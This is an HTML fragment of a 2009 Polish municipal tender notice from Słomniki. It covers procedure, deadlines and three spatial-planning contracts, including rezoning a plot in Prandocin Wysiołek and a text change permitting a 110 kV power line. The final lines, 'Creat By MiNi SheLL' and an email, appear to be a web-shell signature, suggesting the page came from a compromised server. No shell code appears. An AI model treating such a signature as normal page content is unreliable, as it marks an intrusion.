  -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.slomniki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Słomnik, Urząd Miejski w Słomnikach
ul. Kościuszki 64 3
32-090 Słomniki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2009 godzina 12:00, miejsce: Gmina Słomnik, Urząd Miejski w Słomnikach
ul. Kościuszki 64 3
32-090 Słomniki
dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1./ Sporządzenie częściowej zmiany   studium uwarunkowań i kierunków
zagospodarowania przestrzennego Gminy Słomniki ( część A)  wraz z częściową
zmianą miejscowego planu zagospodarowania przestrzennego północnej części
gminy Słomniki ( część B), dla działki o numerze ewidencyjnym 425/1 położonej
w miejscowości Prandocin Wysiołek, Gmina Słomniki, obszar o powierzchni ok. 17 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie częściowych zmian w miejscowym  planie   zagospodarowania przestrzennego gminy Słomniki, z podziałem na zadania:            
ZADANIE 1.

CZĘŚĆ A.

1.	Przedmiotem zamówienia jest sporządzenie częściowej zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Słomniki  zatwierdzonego uchwałą Nr XLV/268/98 Rady Miejskiej w Słomnikach  z dnia 26 marca 1998 r. zgodnie z uchwałą otwierającą prace planistyczne Nr XVIII/161/08  roku Rady Miejskiej w Słomnikach z dnia 26 czerwca 2008 roku, w sprawie przystąpienia do sporządzenia zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Słomniki dla działki 425/1 położonej w Prandocinie Wysiołku, w celu zmiany  przeznaczenia działki z rolnej na budowlaną ( teren zabudowy mieszkaniowej ) wraz z infrastrukturą towarzyszącą i układem komunikacyjnym.,  stosownie do ustaleń ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.) oraz przepisów wykonawczych.
  Uchwała kończąca procedurę planistyczną w w/w sprawie uchyli obowiązujące studium dla tego terenu.

2.	Zakres zamówienia obejmuje: 
2.1.	Wykonanie projektu częściowej zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Słomniki obejmujący obszar   działki 425/1 położonej w miejscowości Prandocin Wysiołek zgodnego z obowiązującym stanem prawnym a w szczególności z: 
2.1.1 art. 10 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu 	przestrzennym /Dz. U. Nr 80, poz. 717 ze zm./,
2.1.2 Rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie 	wymaganego zakresu projektu miejscowego planu zagospodarowania 	przestrzennego /Dz. U. Nr 118, poz. 1233/,
2.1.3. szczególnymi, wykonawczymi: w tym m. in. sporządzenie opracowania  ekofizjograficznego zgodnie z wymogami ustawy Prawo ochrony środowiska, uzyskanie stosownych map niezbędnych do wykonania przedmiotowego opracowania, przygotowanie analizy wniosków do zmiany studium i ewentualnego uzasadnienia w przypadku nieuwzględnienia wniosków, sporządzenie projektu zmiany studium oraz jego aktualizacji, przygotowanie niezbędnych materiałów do zaopiniowania i uzgodnienia wraz z projektami pism do właściwych organów, zaprezentowanie opracowania na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej, wprowadzenie zmian     do projektu zmiany studium wynikających z uzyskanych opinii i uzgodnień, udział w dyskusji publicznej oraz przygotowanie części merytorycznej protokołu, analiza uwag złożonych do projektu zmiany studium z przygotowaniem propozycji rozpatrzenia uwag, przygotowanie uchwały z załącznikami obejmującej także uchylenie obowiązującego studium, prowadzenie dokumentacji planistycznej w celu sprawdzenia zgodności z prawem, reprezentowanie wg. potrzeb na komisjach i sesjach Rady Miejskiej w Słomnikach W przypadku zaskarżenia w/w uchwały przygotowanie pisma ustosunkowującego się do złożonej skargi.

2.2.	Sporządzenia projektu studium przez uprawnionego urbanistę.
2.3.	Przygotowanie projektów, zawiadomień, obwieszczeń, uchwał oraz prowadzenia dokumentacji planistycznej.
2.4.	Opracowanie końcowe jak i opracowania na poszczególnych etapach procedury należy złożyć w minimum trzech egzemplarzach w wersji drukowanej oraz jeden egz. w formie zapisu elektronicznego (tekst +rysunek).
2.5.	Wykonawca zobowiązany będzie ponadto do wykonania projektu studium w ilości niezbędnej do jego zaopiniowania.
2.6. ustalenia i rysunek studium (w pomniejszeniu) w formie elektronicznej - przygotowane do druku w Dzienniku Urzędowym Województwa Małopolskiego, 
2.7.Obszar objęty pracami planistycznymi wynosi: ok. 17  ha, zgodnie z załącznikiem graficznym do Uchwały Rady Miejskiej.

3.	Wykonawca jest zobowiązany do rozpoznania stopnia dostępności materiałów koniecznych do realizacji zamówienia w urzędach i instytucjach dysponujących tymi materiałami. W siedzibie zamawiającego dostępne są następujące dokumenty: uchwała Rady Miejskiej w Słomnikach  o przystąpieniu do sporządzenia zmiany studium, wnioski które wpłynęły do tutejszego Urzędu w sprawie zmian w miejscowym planie zagospodarowania  przestrzennego.
4.	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez wykonawcę podczas wykonywania przedmiotu zamówienia.

CZĘŚĆ B

1.Przedmiotem zamówienia jest opracowanie częściowej zmiany miejscowego planu zagospodarowania przestrzennego północnej części Gminy Słomniki obejmującego wsie: Janikowice, Januszowice, Kacice, Lipna Wola, Muniakowice, Orłów, Prandocin, Prandocin Iły, Prandocin Wysiołek, Smroków-Zagaje Smrokowskie, Wężerów zatwierdzonego Uchwałą Rady Miejskiej w  Słomnikach Nr XXXV/271/06 z dnia 20 marca 2006 roku ogłoszoną w Dzienniku Urzędowym Województwa Małopolskiego Nr 238, póz. 1670 z 18 maja 2006r., zgodnie z Uchwałą nr XVIII/162/08 Rady Miejskiej w Słomnikach z dnia 26  czerwca 2008 roku, w sprawie przystąpienia do sporządzenia zmiany tekstowej i graficznej miejscowego planu zagospodarowania przestrzennego, obejmującej teren działki 425/1 w Prandocinie Wysiołku. Tekstowa i graficzna zmiana planu polega na zmianie przeznaczenia działki ewidencyjnej 425/1 w Prandocinie Wysiołku z rolnej na budowlaną (teren zabudowy mieszkaniowej ) wraz z infrastrukturą towarzyszącą i układem komunikacyjnym..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie  2. /Zmiana miejscowego planu zagospodarowania przestrzennego dla obszaru
miasta Słomniki  obejmującego teren wskazany w  załączniku do Uchwały NrXIII/
117/08 Rady Miejskiej w Słomnikach z dnia 31 stycznia 2008 roku . Teren
o powierzchni 1,3 ha..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 2
 Zakres przedmiotu zamówienia obejmuje sporządzenie zmiany miejscowego planu zagospodarowania przestrzennego Gminy Słomniki zatwierdzonego Uchwałą Nr XXXII(197)96 Rady Miejskiej w Słomnikach z 19 grudnia 1996 roku, w sprawie zmiany miejscowego planu ogólnego zagospodarowania przestrzennego miasta i gminy Słomniki ( Dz. Urz. Woj. Krakowskiego z 1997 roku.,Nr.4, poz.9.), zgodnie z Uchwałą nr XIII/117/08 Rady Miejskiej w Słomnikach z dnia 31 stycznia 2008 roku w sprawie przystąpienia do sporządzenia zmian w miejscowym planie zagospodarowania przestrzennego Gminy Słomniki. 
Zadanie  dotyczy terenu położonego w Słomnikach którego dotychczasowe przeznaczenie w planie zagospodarowania przestrzennego to: 1 UZ- usługi zdrowia  wraz z podstacją pogotowia ratunkowego, teren o powierzchni 1,3 ha.
Zmiana planu polega na zmianie przeznaczenia w/w terenu, zgodnie z załącznikiem graficznym do  Uchwałą nr XIII/117/08 Rady Miejskiej w Słomnikach z dnia 31 stycznia 2008 , Rady Miejskiej w Słomnikach, pod usługi publiczne z dopuszczeniem niepublicznych. Ustala się następujący zakres usług:
1.	Teren oznaczony nr 1- usługi zdrowia
2.	Teren oznaczony nr.2- usługi oświaty ( przedszkole, żłobek, itp.).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3./ Sporządzenie zmian w części tekstowej miejscowego planu zagospodarowania przestrzennego północnej części gminy Słomniki. Zakres obszaru objętego zmianą tekstową planu określa załącznik graficzny do Uchwały Rady Miejskiej w Słomnikach Nr.XV/141/08 z dnia 18 kwietnia 2008 roku, w sprawie przystąpienia do sporządzenia zmian w części tekstowej miejscowego planu zagospodarowania przestrzennego Gminy Słomniki..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 3 
 Zakres przedmiotu zamówienia obejmuje sporządzenie zmiany w części tekstowej miejscowego planu zagospodarowania przestrzennego północnej części gminy Słomniki, obejmującego wsie Janikowice, Januszowice, Kacice, Lipna Wola, Muniakowice, Orłów, Prandocin, Prandocin-Iły, Prandocin Wysiołek, Smroków, Zagaje Smrokowskie, Wężerów, zatwierdzonego Uchwałą Rady Miejskiej w Słomnikach Nr. XXX/271/06 z dnia 20 marca 2006 roku, ogłoszoną w Dzienniku Urzędowym Województwa Małopolskiego Nr 238, poz. 1670 z dnia 18 maja 2006 roku .
Tekstowa zmiana planu dotyczy dopuszczenia budowy napowietrznej dwutorowej linii 110 kV w miejsce wskazanej w planie napowietrznej linii SN 15 kV, po dotychczasowej trasie z zachowaniem strefy technicznej ustalonej w planie.
 Zakres obszaru objętego zmianą tekstową planu określa załącznik graficzny do Uchwały Rady Miejskiej w Słomnikach Nr.XV/141/08 z dnia 18 kwietnia 2008 roku, w sprawie przystąpienia do sporządzenia zmian w części tekstowej miejscowego planu zagospodarowania przestrzennego Gminy Słomniki..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com